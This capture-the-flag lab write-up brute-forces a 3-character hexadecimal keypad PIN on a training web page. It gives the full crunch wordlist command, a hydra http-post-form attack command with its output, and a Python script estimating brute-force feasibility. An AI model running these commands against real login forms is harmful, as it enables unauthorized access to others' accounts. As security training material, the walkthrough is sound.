# Day 3

### Learning Objectives

* Password complexity and the number of possible combinations
* How the number of possible combinations affects the feasibility of brute force attacks
* Generating password combinations using `crunch`
* Trying out passwords automatically using `hydra`

The room is very straightforward: all the commands are already given to us, so we just need to run them.

After starting the machine and going to the site, we find a keypad-like interface.

<figure><img src="/files/eMgCAl4ScAd5DY2qDMkO" alt=""><figcaption></figcaption></figure>

Upon entering a random code, we can see it is only a 3-digit PIN, which should be very quick to brute force.

The numeric keypad shows 16 characters, 0 to 9 and A to F, i.e., the hexadecimal digits. We need to prepare a list of all the PIN codes that match these criteria. We will use Crunch, a tool that generates a list of all possible password combinations based on given criteria. We need to issue the following command:

`crunch 3 3 0123456789ABCDEF -o 3digits.txt`

The command above specifies the following:

* `3`: the first number is the minimum length of the generated password
* `3`: the second number is the maximum length of the generated password
* `0123456789ABCDEF`: the character set to use to generate the passwords
* `-o 3digits.txt`: saves the output to the `3digits.txt` file

```
┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ crunch 3 3 0123456789ABCDEF -o 3digits.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096 

crunch: 100% completed generating output
```

The main login page <http://10.10.125.46:8000/pin.php> receives the input from the user and sends it to `/login.php` using the name `pin`.

These three pieces of information, `post`, `/login.php`, and `pin`, are necessary to set the arguments for Hydra.

We will use `hydra` to test every possible password that can be put into the system. The command to brute force the above form is:

{% code overflow="wrap" %}

```
hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
```

{% endcode %}

The command above will try one password after another in the `3digits.txt` file.

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-04 00:54:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.125.46:8000/login.php:pin=^PASS^:Access denied
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
.
.
.
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/control.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[8000][http-post-form] host: 10.10.125.46   password: [REDACTED]
[STATUS] attack finished for 10.10.125.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-04 00:56:52

```

{% endcode %}
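
As an added example (not part of the room or the original write-up), the Python below reproduces the line and byte counts Crunch reported and shows how the worst-case time grows with PIN length, using the start and finish times of the Hydra run above as the rate. It assumes Hydra sent the whole list, so the rate is an upper bound, and the lockout parameters are hypothetical.

```python
from datetime import datetime

HEX_KEYPAD = "0123456789ABCDEF"  # character set passed to crunch on this page

def crunch_stats(charset, min_len, max_len):
    """(lines, bytes) for a crunch run: one candidate per line plus a newline.
    Assumes the character set has no repeated characters."""
    n = len(charset)
    lengths = range(min_len, max_len + 1)
    lines = sum(n ** k for k in lengths)
    size = sum((k + 1) * n ** k for k in lengths)
    return lines, size

def observed_rate(start, finish, tries):
    """Tries per second from Hydra's start/finish timestamps.
    Assumption: all `tries` were sent; -f may stop earlier, so this is an upper bound."""
    fmt = "%Y-%m-%d %H:%M:%S"
    elapsed = datetime.strptime(finish, fmt) - datetime.strptime(start, fmt)
    return tries / elapsed.total_seconds()

def seconds_to_exhaust(keyspace, rate, lockout_after=0, lockout_secs=0):
    """Worst-case time to try every candidate (the correct one comes last).
    lockout_after/lockout_secs model a hypothetical pause after every N failures."""
    total = keyspace / rate
    if lockout_after:
        total += ((keyspace - 1) // lockout_after) * lockout_secs
    return total

def feasibility_table(rate, lengths=range(3, 9)):
    """Rows of (length, candidates, wordlist bytes, worst-case seconds)."""
    rows = []
    for k in lengths:
        lines, size = crunch_stats(HEX_KEYPAD, k, k)
        rows.append((k, lines, size, seconds_to_exhaust(lines, rate)))
    return rows

if __name__ == "__main__":
    # Timestamps and try count taken from the Hydra output above.
    rate = observed_rate("2023-12-04 00:54:33", "2023-12-04 00:56:52", 4096)
    print(f"observed rate: at most {rate:.1f} tries/s")
    for k, lines, size, secs in feasibility_table(rate):
        print(f"{k} hex digits: {lines:>13,} candidates {size:>14,} bytes {secs / 3600:>10.2f} h")
    # Hypothetical control: 5 failures, then a 300-second lockout, on the 3-digit keypad.
    locked = seconds_to_exhaust(16 ** 3, rate, lockout_after=5, lockout_secs=300)
    print(f"3 digits with lockout: {locked / 86400:.2f} days")
```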

We get the PIN for the keypad. Now we just enter it in the keypad.

<figure><img src="/files/sCgqKC7XdUg1t4DS480K" alt=""><figcaption></figcaption></figure>

Now we just need to click on Unlock Door and it will give us our flag.

<figure><img src="/files/EVyLIYSBsZ8HA3hKOGQH" alt=""><figcaption></figcaption></figure>
